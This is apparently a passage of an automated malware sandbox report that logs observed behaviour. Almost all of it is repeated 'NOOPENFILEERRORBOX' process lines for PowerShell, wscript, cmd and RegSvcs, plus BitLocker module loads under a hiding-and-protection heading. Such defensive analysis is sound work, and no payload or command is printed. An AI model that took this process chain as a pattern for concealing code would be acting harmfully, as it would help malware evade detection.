          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE3785E push eax; iretd 1_2_00007FFB4AE3786D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE3782E pushad ; iretd 1_2_00007FFB4AE3785D

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
